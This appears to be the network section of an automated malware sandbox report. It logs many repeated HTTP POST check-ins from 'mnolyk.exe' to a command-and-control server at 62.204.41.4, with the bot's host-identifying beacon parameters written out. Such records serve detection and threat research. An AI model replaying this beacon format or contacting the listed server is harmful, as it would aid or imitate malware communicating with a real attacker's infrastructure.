                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:11.766469002 CET402OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.832688093 CET402INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    202192.168.2.34990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:12.046729088 CET403OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.111684084 CET403INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    203192.168.2.34990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:12.384320021 CET404OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.449224949 CET404INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    204192.168.2.34990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:12.698779106 CET405OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.762974024 CET405INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    205192.168.2.34990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:13.917743921 CET406OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:13.983855963 CET406INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    206192.168.2.34990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:14.246090889 CET407OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:14.312478065 CET407INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    207192.168.2.34990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:14.933906078 CET408OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:14.998792887 CET408INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    208192.168.2.34991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:15.871067047 CET409OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:15.938445091 CET409INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    209192.168.2.34991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:16.121218920 CET410OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.187607050 CET410INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    21192.168.2.34972262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:17.801754951 CET222OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.865456104 CET222INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    210192.168.2.34991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:16.359167099 CET411OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.422133923 CET411INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    211192.168.2.34991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:16.595551968 CET412OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.661514044 CET412INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    212192.168.2.34991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:16.837699890 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:16.904551029 CET413INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    213192.168.2.34991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:17.076591015 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.142472982 CET414INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    214192.168.2.34991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:17.326422930 CET414OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.389087915 CET415INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    215192.168.2.34991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:17.561486006 CET415OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.625283957 CET416INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    216192.168.2.34991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:17.798707962 CET416OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:17.864259005 CET417INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    217192.168.2.34991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:18.035542965 CET417OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.102407932 CET418INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    218192.168.2.34992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:18.281071901 CET418OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.344707966 CET419INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    219192.168.2.34992162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:18.515785933 CET419OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:18.579456091 CET420INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
